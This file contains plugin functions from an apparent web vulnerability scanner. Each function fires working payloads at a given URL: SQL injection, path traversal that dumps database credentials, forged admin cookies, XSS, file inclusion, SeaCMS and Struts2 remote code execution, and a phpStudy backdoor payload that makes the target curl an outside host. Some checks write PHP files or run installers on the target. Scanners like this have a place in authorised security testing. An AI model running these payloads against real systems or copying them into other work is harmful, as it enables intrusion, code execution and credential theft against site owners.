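def medusa(Url: str, RandomAgent: str, UnixTimestamp) -> None:
    """Probe a Yicaitong (一采通) e-procurement install for error-based SQL injection.

    Every candidate ``.asp`` endpoint is requested with a quoted ``InviteId``
    suffix that asks MSSQL to compare the string ``~testXQ17`` (built from
    ``CHAR()`` calls) with a number; a vulnerable server echoes that marker in
    its conversion-error page.  A hit is recorded through
    ``ClassCongregation.VulnerabilityDetails`` and ``ClassCongregation.WriteFile``.
    A failure on one endpoint is logged via ``ClassCongregation.ErrorLog`` and
    the remaining endpoints are still tried.

    Bug fixed here: the original compared the *lower-cased* response against the
    mixed-case marker ``"testXQ17"``, which can never match, so the plugin could
    not report anything.  The match is now case-insensitive as intended.

    Args:
        Url: target as supplied by the caller; split by ``UrlProcessing``.
        RandomAgent: value sent as the ``User-Agent`` header.
        UnixTimestamp: opaque value forwarded to ``VulnerabilityDetails``.
    """
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        # Only http/https get a default; any other scheme keeps port=None.
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80

    urls = [
        "/Rat/ebid/viewInvite3.asp?InviteId=0000002852",
        "/Rat/ebid/viewInvite4.asp?InviteId=0000002852",
        "/Rat/ebid/viewInvite5.asp?InviteId=0000002852",
        "/Rat/ebid/viewInvite6.asp?InviteId=0000002852",
        "/Rat/ebid/viewInvite2.asp?InviteId=0000002852",
        "/Rat/ebid/viewInvite1.asp?InviteId=0000002852",
        "/Rat/EBid/ViewClarify1.asp?InviteId=11",
        "/Rat/EBid/ViewClarify.asp?InviteId=11",
        "/Rat/EBid/AuditForm/AuditForm_ExpertForm.asp?InviteId=11",
    ]
    # ' and (CHAR(126)+CHAR(116)+...+CHAR(55))>0--  ->  "~testXQ17" in the error text
    data = "%27%20and%20(CHAR(126)%2BCHAR(116)%2BCHAR(101)%2BCHAR(115)%2BCHAR(116)%2BCHAR(88)%2BCHAR(81)%2BCHAR(49)%2BCHAR(55))%3E0--"
    # Compared against the lower-cased body, so the marker must be lower-case too.
    marker = "testxq17"

    headers = {
        'User-Agent': RandomAgent,
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
    }
    # One session for all probes against the same host.
    s = requests.session()

    for payload in urls:
        try:
            payload_url = scheme + "://" + url + ":" + str(port) + payload + data
            # verify=False: target TLS certificates are deliberately not validated
            # (scanner convention in this file); the response is therefore not
            # authenticated and is only used for the marker search.
            resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
            con = resp.text
            if marker in con.lower():
                Medusa = "{}存在一采通电子采购系统SQL注入漏洞\r\n 验证数据:\r\n返回内容:{}\r\npayload:{}\r\n".format(url, con, payload_url)
                _t = VulnerabilityInfo(Medusa)
                ClassCongregation.VulnerabilityDetails(_t.info, url, UnixTimestamp).Write()  # record url + evidence
                ClassCongregation.WriteFile().result(str(url), str(Medusa))  # url is the per-target file name
        except Exception:
            # Log the plugin name ('algroup') against the target and keep going.
            _ = VulnerabilityInfo('').info.get('algroup')
            ClassCongregation.ErrorLog().Write(url, _)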
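def medusa(Url: str, RandomAgent: str, UnixTimestamp) -> None:
    """Check MetInfo for arbitrary file read via ``/include/thumb.php?dir=``.

    Three traversal encodings are tried against ``config/config_db.php``; a 200
    whose body contains ``<?php`` together with the ``con_db_host`` /
    ``con_db_por`` / ``con_db_id`` settings is reported through
    ``VulnerabilityDetails`` and ``WriteFile``.  Exceptions go to
    ``ErrorHandling().Outlier`` and ``ErrorLog``; later payloads are still tried.

    Fix: the backslash payload is now a raw string.  ``'http\\..\\config'`` in a
    normal literal contains the invalid escapes ``\\.`` and ``\\c`` (a
    DeprecationWarning, SyntaxWarning from 3.12); the bytes sent are unchanged.

    Args:
        Url: target, split by ``UrlProcessing``.
        RandomAgent: ``User-Agent`` header value.
        UnixTimestamp: opaque value forwarded to ``VulnerabilityDetails``.
    """
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80

    payloads = [
        '..././http/..././config/config_db.php',
        '.....///http/.....///config/config_db.php',
        r'http\..\..\config\config_db.php',
    ]
    headers = {
        'User-Agent': RandomAgent,
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
    }
    # Markers that together identify a leaked MetInfo DB config file.
    markers = ('con_db_host', '<?php', 'con_db_por', 'con_db_id')
    s = requests.session()

    for payload in payloads:
        try:
            payload_url = scheme + "://" + url + ":" + str(port) + '/include/thumb.php?dir=' + payload
            # verify=False: scanner convention, target certificates are not validated.
            resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
            con = resp.text
            if resp.status_code == 200 and all(m in con for m in markers):
                # NOTE: the full config file (DB credentials) is copied into the report.
                Medusa = "{}存在Metinfo任意文件读取漏洞\r\n 漏洞地址:\r\n{}\r\n漏洞详情:\r\n{}".format(
                    url, payload_url, con)
                _t = VulnerabilityInfo(Medusa)
                ClassCongregation.VulnerabilityDetails(
                    _t.info, url, UnixTimestamp).Write()  # record url + evidence
                ClassCongregation.WriteFile().result(
                    str(url), str(Medusa))  # url is the per-target file name
        except Exception as e:
            _ = VulnerabilityInfo('').info.get('algroup')
            ClassCongregation.ErrorHandling().Outlier(e, _)
            ClassCongregation.ErrorLog().Write(url, _)  # target + plugin name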
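def medusa(Url: str, RandomAgent: str, UnixTimestamp) -> None:
    """Send the CSDJCMS stored-XSS PoC to ``/user/do.php`` and report on a hit.

    The POST carries a fixed, forged admin ``Cookie`` header (``CS_AdminID=1``,
    ``CS_Login=<md5>`` and assorted tracking cookies copied from a capture) and a
    profile form whose ``CS_Qianm`` field is an ``<isindex ... onerror>`` payload.

    Bug fixed: the detection was ``con.find('PHP Version') != -1 and
    con.find('System')`` — ``find`` returns -1 (truthy) when absent, so the
    second term was effectively always true.  Both markers are now real
    membership tests.  The hard-coded ``Content-Length: 169`` was dropped:
    requests computes the header from the body it actually sends.

    NOTE(review): the detection looks for phpinfo output (``PHP Version`` /
    ``System``) although the payload is an XSS marker — it appears to be copied
    from the CSDJCMS getshell check; confirm what this PoC is meant to observe.
    NOTE(review): ``ac=edit@op=zl`` uses ``@`` where ``&`` would separate two
    query parameters — confirm against the original PoC before changing it.

    Args:
        Url: target, split by ``UrlProcessing``.
        RandomAgent: ``User-Agent`` header value.
        UnixTimestamp: opaque value forwarded to ``VulnerabilityDetails``.
    """
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload = "/user/do.php?ac=edit@op=zl"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        referer = scheme + "://" + url
        headers = {
            "User-Agent": RandomAgent,
            "Accept":
            "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language": "zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3",
            "Accept-Encoding": "gzip, deflate",
            "Referer":
            "{}/admin/admin_t ... ;file=artindex.html".format(referer),
            # Forged admin session: the CMS is expected to trust these values.
            "Cookie":
            "CS_AdminID=1; CS_AdminUserName=1; CS_AdminPassWord=1; CS_Quanx=0_1,1_1,1_2,1_3,1_4,1_5,2_1,2_2,2_3,2_4,2_5,2_6,2_7,3_1,3_2,3_3,3_4,4_1,4_2,4_3,4_4,4_5,4_6,4_7,5_1,5_2,5_3,5_4,5_5,6_1,6_2,6_3,7_1,7_2,8_1,8_2,8_3,8_4; CS_Login=a3f5f5a662e8a36525f4794856e2d0a2; PHPSESSID=48ogo025b66lkat9jtc8aecub1; CNZZDATA3755283=cnzz_eid%3D1523253931-1364956519-http%253A%252F%252Fwww.djkao.com%26ntime%3D1364956519%26cnzz_a%3D1%26retime%3D1365129491148%26sin%3D%26ltime%3D1365129491148%26rtime%3D0; bdshare_firstime=1365129335963",
            "Connection": "keep-alive",
            "Content-Type": "application/x-www-form-urlencoded",
        }
        data = "CS_Name=aaaaaa&CS_Email=a%40qq.com&CS_Nichen=aaaaaa&CS_Sex=0&CS_City=%C1%C9%C4%FE%CA%A1&CS_QQ=111111111&CS_Qianm=<isindex type=image src=1 onerror=alert(/'xss'/)>"
        s = requests.session()
        # verify=False: scanner convention, target certificates are not validated.
        resp = s.post(payload_url,
                      data=data,
                      headers=headers,
                      timeout=6,
                      verify=False)
        con = resp.text
        if 'PHP Version' in con and 'System' in con:
            Medusa = "{}存在CSDJCMS存储型跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, UnixTimestamp).Write()  # record url + evidence
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  # url is the per-target file name
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorLog().Write(url, _)  # target + plugin name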
def medusa(Url: str, RandomAgent: str, proxies=None, **kwargs) -> None:
    """Check a Citrix gateway for the ``/vpn/../vpns/`` path traversal.

    Two traversal URLs are fetched; a 200 whose body contains
    ``encrypt password`` is reported via ``VulnerabilityDetails`` (which gets
    ``**kwargs`` unchanged) and ``WriteFile``.  Any exception is handed to
    ``ErrorHandling().Outlier`` and ``ErrorLog`` and ends the loop.

    Args:
        Url: target, split by ``UrlProcessing``.
        RandomAgent: ``User-Agent`` header value.
        proxies: proxy spec, normalised by ``ClassCongregation.Proxies``.
        **kwargs: forwarded to ``VulnerabilityDetails``.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        # Default only http/https; other schemes keep port=None.
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80

    traversals = ("/vpn/../vpns/services.html", "/vpn/../vpns/cfg/smb.conf")
    headers = {
        'User-Agent': RandomAgent,
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept':
        'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        "Accept-Language":
        "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding": "gzip, deflate",
    }
    try:
        base = scheme + '://' + url + ':' + str(port)
        for traversal in traversals:
            target = base + traversal
            # Fresh session per request; verify=False is the scanner convention
            # (target certificates are not validated).
            resp = requests.session().get(target,
                                          headers=headers,
                                          timeout=6,
                                          proxies=proxies,
                                          verify=False)
            body = resp.text
            if resp.status_code != 200 or "encrypt password" not in body:
                continue
            Medusa = "{}存在Citrix网关路径遍历漏洞\r\n 验证数据:\r\nPOC:{}\r\n返回内容:{}\r\n".format(
                url, target, body)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, **kwargs).Write()  # record url + evidence
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  # url is the per-target file name
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        ClassCongregation.ErrorLog().Write(
            "Plugin Name:" + _ + " || Target Url:" + url, e)
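def Main(Url, FileName, Values, ProxyIp) -> None:
    """Run every WordPress plugin under ``Cms.Wordpress`` against ``Url``.

    Each plugin's ``medusa(Url, RandomAgent, ProxyIp)`` result is appended to
    ``FileName`` through ``ClassCongregation.WriteFile``.  A plugin that raises
    is skipped so the others still run.

    Fix: the six copy-pasted ``try: ... except: pass`` blocks used a bare
    ``except``, which also swallowed ``KeyboardInterrupt`` / ``SystemExit``;
    the loop now catches ``Exception`` only.

    Args:
        Url: target passed straight to each plugin.
        FileName: output file handed to ``ClassCongregation.WriteFile``.
        Values: user-supplied browser header selection for ``UserAgentS``.
        ProxyIp: third positional argument of every plugin's ``medusa``.
    """
    WriteFile = ClassCongregation.WriteFile(
        FileName)  # output writer for this target (must be created first)
    ua = ClassCongregation.UserAgentS(Values)  # user-chosen browser header
    RandomAgent = ua.UserAgent()
    plugin_names = (
        "Wordpress_admin_ajax_filedownload",
        "Wordpress_display_widgets_backdoor",
        "Wordpress_plugin_azonpop_sqli",
        "Wordpress_plugin_mailpress_rce",
        "Wordpress_plugin_ShortCode_lfi",
        "Wordpress_woocommerce_code_exec",
    )
    for name in plugin_names:
        try:
            plugin = getattr(Cms.Wordpress, name)
            Medusa = plugin.medusa(Url, RandomAgent, ProxyIp)
            WriteFile.Write(Medusa)
        except Exception:
            # Best-effort: one broken plugin must not stop the rest.
            continue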
def medusa(Url: str, RandomAgent: str, UnixTimestamp) -> None:
    """Probe BugFree's ``/bugfree/Login.php`` xajax handler for file inclusion.

    A form POST names ``../../5555.txt%00`` as the language file; a response
    containing both ``System`` and ``Build Date`` is treated as a hit and
    reported through ``VulnerabilityDetails`` and ``WriteFile``.  Exceptions are
    written to ``ErrorLog`` with the plugin name.

    NOTE(review): ``%00`` is inside a dict value, so requests will form-encode it
    again (``%2500``) — confirm the original PoC intended a literal ``%00``.

    Args:
        Url: target, split by ``UrlProcessing``.
        RandomAgent: ``User-Agent`` header value.
        UnixTimestamp: opaque value forwarded to ``VulnerabilityDetails``.
    """
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80

    form = {
        'xajax': 'xSelectLanguage',
        'xajaxargs[]': '../../5555.txt%00',
        'xajaxr': '1377604187765'
    }
    headers = {
        'User-Agent': RandomAgent,
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
    }
    try:
        target = scheme + "://" + url + ":" + str(port) + "/bugfree/Login.php"
        # verify=False: scanner convention, target certificates are not validated.
        resp = requests.session().post(target,
                                       headers=headers,
                                       data=form,
                                       timeout=6,
                                       verify=False)
        body = resp.text
        hit = "System" in body and "Build Date" in body
        if hit:
            Medusa = "{}存在BugFree文件包含漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回内容:{}\r\n".format(
                url, target, body)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, UnixTimestamp).Write()  # record url + evidence
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  # url is the per-target file name
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorLog().Write(url, _)  # target + plugin name
def medusa(Url: str, RandomAgent: str, proxies=None, **kwargs) -> None:
    """Check the CMS Made Simple installer for reflected XSS in ``default_cms_lang``.

    A 20-character random marker is embedded in a ``<body onload=alert(...)>``
    payload; if the installer echoes the marker back with status 200 the finding
    is recorded through ``VulnerabilityDetails`` and ``WriteFile``.  Errors go to
    ``ErrorHandling().Outlier`` and ``ErrorLog``.

    Args:
        Url: target, split by ``ClassCongregation.UrlProcessing``.
        RandomAgent: ``User-Agent`` header value.
        proxies: proxy spec, normalised by ``ClassCongregation.Proxies``.
        **kwargs: forwarded to ``VulnerabilityDetails``.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        # Random marker so the reflection check cannot match pre-existing content.
        marker = ClassCongregation.randoms().result(20)
        target = (scheme + "://" + url + ":" + str(port)
                  + "/k/cms/cmsmadesimple/install/index.php?sessiontest=1")
        form = '''default_cms_lang='%3e"%3e%3cbody%2fonload%3dalert({})%3e&submit=Submit'''.format(
            marker)
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            "Accept-Language":
            "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
        }
        # verify=False: scanner convention, target certificates are not validated.
        resp = requests.post(target,
                             data=form,
                             headers=headers,
                             proxies=proxies,
                             timeout=6,
                             verify=False)
        body = resp.text
        if resp.status_code == 200 and marker in body:
            Medusa = "{}存在CMSMS跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, target, body)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, **kwargs).Write()  # record url + evidence
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  # url is the per-target file name
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        ClassCongregation.ErrorLog().Write(
            "Plugin Name:" + _ + " || Target Url:" + url, e)
def medusa(Url: str, RandomAgent: str, proxies=None, **kwargs) -> None:
    """Test a phpStudy-bundled phpMyAdmin for a default-password login.

    ``payload`` (the login path) and ``post_data`` (the credential form) are
    module-level names, not defined here.  The login POST and a follow-up GET of
    the same path share one session so the session cookie carries over; a hit
    is a POST body mentioning ``frame_navigation`` plus a GET body mentioning
    ``navigation.php``.  Errors go to ``ErrorHandling().Outlier`` and ``ErrorLog``.

    Args:
        Url: target, split by ``UrlProcessing``.
        RandomAgent: ``User-Agent`` header value.
        proxies: proxy spec, normalised by ``ClassCongregation.Proxies``.
        **kwargs: forwarded to ``VulnerabilityDetails``.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        target = scheme + "://" + url + ':' + str(port) + payload
        headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            "Content-Type": "application/x-www-form-urlencoded",
            'User-Agent': RandomAgent,
        }
        # One session: the GET must reuse the cookie set by the login POST.
        # verify=False: scanner convention, target certificates are not validated.
        session = requests.session()
        login = session.post(target,
                             data=post_data,
                             headers=headers,
                             proxies=proxies,
                             timeout=5,
                             verify=False)
        follow_up = session.get(target,
                                headers=headers,
                                timeout=5,
                                proxies=proxies,
                                verify=False)
        logged_in = ('navigation.php' in follow_up.text.lower()
                     and 'frame_navigation' in login.text.lower())
        if logged_in:
            Medusa = "{}存在phpstudy_phpmyadmin默认密码漏洞 \r\n漏洞详情:\r\nPayload:{}\r\nPost:{}\r\n".format(
                url, target, post_data)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, **kwargs).Write()  # record url + evidence
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  # url is the per-target file name
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        ClassCongregation.ErrorLog().Write(url, _)  # target + plugin name
def medusa(Url: str, RandomAgent: str, proxies=None, **kwargs) -> None:
    """Check the CMS Made Simple installer for reflected XSS in ``docroot``.

    The installer's final step is POSTed with a fixed ``<img onerror=alert(...)>``
    marker in ``docroot``; a 200 echoing that marker inside an ``<a href=`` is
    reported through ``VulnerabilityDetails`` and ``WriteFile``.  Errors go to
    ``ErrorHandling().Outlier`` and ``ErrorLog``.

    NOTE(review): the form also carries DB credentials, ``adminpassword`` and
    ``createtables=1`` — on a host whose installer is still reachable this is a
    real installation attempt, not a read-only probe; confirm that is acceptable.

    Args:
        Url: target, split by ``ClassCongregation.UrlProcessing``.
        RandomAgent: ``User-Agent`` header value.
        proxies: proxy spec, normalised by ``ClassCongregation.Proxies``.
        **kwargs: forwarded to ``VulnerabilityDetails``.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        target = scheme + "://" + url + ":" + str(port) + "/k/cms/cmsmadesimple/install/index.php"
        form = '''docroot=$("%3cimg%2fsrc%3d'x'%2fonerror%3dalert(cscan-hyhmnn)%3e")&docpath=%2Fhome%2Fk%2Fpublic_html%2Fcms%2Fcmsmadesimple&querystr=page&frontendlang=en_US&umask=022&host=localhost&dbms=mysqli&database=cms&username=root&password=superpass&db_port=0&timezone=Europe%2FBerlin&prefix=cms_&createtables=1&email_accountinfo=0&adminemail=admin%40here.com&adminusername=admin&adminpassword=password&page=7&default_cms_lang=en_US'''
        # Decoded form of the docroot value as the vulnerable page reflects it.
        reflected = '''<a href="$("<img/src='x'/onerror=alert(cscan-hyhmnn)>'''
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            "Accept-Language":
            "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
        }
        # verify=False: scanner convention, target certificates are not validated.
        resp = requests.post(target,
                             data=form,
                             headers=headers,
                             proxies=proxies,
                             timeout=6,
                             verify=False)
        body = resp.text
        if resp.status_code == 200 and reflected in body:
            Medusa = "{}存在CMSMS跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, target, body)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, **kwargs).Write()  # record url + evidence
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  # url is the per-target file name
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        ClassCongregation.ErrorLog().Write(
            "Plugin Name:" + _ + " || Target Url:" + url, e)
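def medusa(Url: str, RandomAgent: str, ProxyIp) -> None:
    """Probe ``/search.php`` for template-injection RCE (SeaCMS-style ``{searchpage:...}`` tags).

    The POST splices ``phpinfo()`` from the query string into the search
    template; a 200 whose body carries the usual phpinfo markers (``System``,
    ``Compiler``, ``Build Date``, ``IPv6 Support``, ``Configure Command``) is
    reported.  Unlike its siblings this plugin rates the finding with
    ``VulnerabilityDetails(...).High()`` rather than ``.Write()``.

    Fix: the bare ``except:`` became ``except Exception:`` so Ctrl-C and
    ``SystemExit`` are no longer swallowed and mis-logged as plugin errors.

    NOTE(review): the report embeds ``con.encode('utf-8')``, i.e. a ``bytes``
    repr (``b'...'``) rather than the page text — looks like a Python 2
    leftover; confirm before changing the report format.

    Args:
        Url: target, split by ``UrlProcessing``.
        RandomAgent: ``User-Agent`` header value.
        ProxyIp: accepted for signature compatibility; not used in this body.
    """
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload = "/search.php?phpinfo()"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        # Template tags reassemble to: if(1):assert($_SERVER[QUERY_STRING]);/*
        payload_data = "searchtype=5&searchword={if{searchpage:year}&year=:as{searchpage:area}}&area=s{searchpage:letter}&letter=ert{searchpage:lang}&yuyan=($_SE{searchpage:jq}&jq=RVER{searchpage:ver}&&ver=[QUERY_STRING]));/*"
        headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'Accept-Language': 'en',
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Origin': scheme + '://' + url,
            'Referer': payload
        }
        phpinfo_markers = ('System', 'Compiler', 'Build Date', 'IPv6 Support', 'Configure Command')

        s = requests.session()
        # verify=False: scanner convention, target certificates are not validated.
        resp = s.post(payload_url,
                      headers=headers,
                      data=payload_data,
                      timeout=5,
                      verify=False)
        con = resp.text
        if resp.status_code == 200 and all(m in con for m in phpinfo_markers):
            Medusa = "{} 存在远程命令执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n{}".format(
                url, payload_url, con.encode(encoding='utf-8'))
            _t = VulnerabilityInfo(Medusa)
            web = ClassCongregation.VulnerabilityDetails(_t.info)
            web.High()  # severity levels: serious / High / Intermediate / Low
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  # url is the per-target file name
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorLog().Write(url, _)  # target + plugin name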
def medusa(Url: str, RandomAgent: str, Token, proxies=None) -> None:
    """Check for the phpStudy backdoor via a base64 PHP payload in ``accept-charset``.

    The payload is ``system("curl http://<dnslog host>")``; the finding is
    confirmed out-of-band by ``ClassCongregation.Dnslog().result()``, not by the
    HTTP response.  ``payload`` (the request path) is a module-level name.
    Errors go to ``ErrorHandling().Outlier`` and ``ErrorLog``.

    Args:
        Url: target, split by ``UrlProcessing``.
        RandomAgent: ``User-Agent`` header value.
        Token: opaque value forwarded to ``VulnerabilityDetails``.
        proxies: proxy spec, normalised by ``ClassCongregation.Proxies``.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80

    # DNS-log callback proves execution; b64encode returns bytes, which requests
    # accepts as a header value.
    DL = ClassCongregation.Dnslog()
    php_code = ('''system("curl http://{}");''').format(DL.dns_host())
    encoded = base64.b64encode(php_code.encode('utf-8'))
    try:
        target = scheme + "://" + url + ':' + str(port) + payload
        headers = {
            'Sec-Fetch-Mode': 'navigate',
            'Sec-Fetch-User': '******',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
            'Sec-Fetch-Site': 'none',
            'accept-charset': encoded,
            'Accept-Encoding': 'gzip,deflate',
            'Accept-Language': 'zh-CN,zh;q=0.9',
            'User-Agent': RandomAgent
        }
        # Response body is irrelevant; only the DNS-log hit matters.
        # verify=False: scanner convention, target certificates are not validated.
        requests.session().get(target,
                               headers=headers,
                               timeout=5,
                               proxies=proxies,
                               verify=False)
        if not DL.result():
            return
        Medusa = "{} 存在phpStudyBackdoor脚本漏洞\r\n漏洞详情:\r\nPayload:{}\r\nHeader:{}\r\nDNSLOG内容:{}\r\n".format(
            url, target, headers, DL.dns_host())
        _t = VulnerabilityInfo(Medusa)
        ClassCongregation.VulnerabilityDetails(
            _t.info, url, Token).Write()  # record url + evidence
        ClassCongregation.WriteFile().result(
            str(url), str(Medusa))  # url is the per-target file name
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        ClassCongregation.ErrorLog().Write(url, _)  # target + plugin name
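def medusa(Url: str, RandomAgent: str, Token, proxies=None) -> None:
    """Check for Struts2 OGNL RCE by inspecting a 302 ``Location`` header.

    ``payload`` is a module-level name (the request path).  Redirects are not
    followed; a 302 whose ``Location`` contains ``54289`` is treated as proof
    that the expression was evaluated (presumably the payload computes that
    number — it is not visible here).

    Fixes:
    * ``resp.headers['Location']`` raised ``KeyError`` on any non-redirect
      answer, so every *clean* target was logged as a plugin error.  The header
      is now read with ``.get('Location', '')``.
    * ``verify=False`` is passed like every other plugin in this file; before,
      an https target with an untrusted certificate also ended up in the error
      log instead of being tested.

    Args:
        Url: target, split by ``UrlProcessing``.
        RandomAgent: ``User-Agent`` header value.
        Token: opaque value forwarded to ``VulnerabilityDetails``.
        proxies: proxy spec, normalised by ``ClassCongregation.Proxies``.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    payload_url = scheme + "://" + url + ':' + str(port) + payload
    host = url + ':' + str(port)
    headers = {
        'Host': host,
        'Accept-Encoding': 'gzip, deflate',
        'Accept':
        'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language':
        'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'User-Agent': RandomAgent,
        'Connection': 'close',
        'DNT': '1',
        'Upgrade-Insecure-Requests': '1'
    }

    try:
        s = requests.session()
        # allow_redirects=False: the evidence is in the redirect itself.
        # verify=False: scanner convention, target certificates are not validated.
        resp = s.get(payload_url,
                     headers=headers,
                     proxies=proxies,
                     timeout=5,
                     allow_redirects=False,
                     verify=False)
        location = resp.headers.get('Location', '')
        if resp.status_code == 302 and '54289' in location.lower():
            Medusa = "{} 存在Struts2远程代码执行漏洞\r\n漏洞详情:\r\n影响版本:版本低于<=Struts2_3_34,Struts2_5_16\r\nPayload:{}\r\n".format(
                url, payload_url)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, Token).Write()  # record url + evidence
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  # url is the per-target file name
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        ClassCongregation.ErrorLog().Write(url, _)  # target + plugin name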
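def medusa(Url: str, RandomAgent: str, UnixTimestamp) -> None:
    """CSDJCMS template-editor getshell check.

    With a forged admin ``Cookie`` (``S_AdminID=1``, ``S_Login=<md5>`` and
    tracking cookies copied from a capture) the site root is POSTed a template
    save that writes ``cs-bottom.php`` containing ``<?php phpinfo ?>`` into
    ``../skins/index/html/``.  A response carrying ``PHP Version`` and ``System``
    is reported through ``VulnerabilityDetails`` and ``WriteFile``.

    NOTE(review): this is an intrusive check — it creates a PHP file on a
    vulnerable target.  Keep that in mind for scope/authorisation and cleanup.

    Bug fixed: the detection was ``con.find('PHP Version') != -1 and
    con.find('System')`` — ``find`` returns -1 (truthy) when absent, so the
    second term never filtered anything.  The hard-coded ``Content-Length: 169``
    was dropped: requests sets it from the body it actually sends.

    Args:
        Url: target, split by ``ClassCongregation.UrlProcessing``.
        RandomAgent: ``User-Agent`` header value.
        UnixTimestamp: opaque value forwarded to ``VulnerabilityDetails``.
    """
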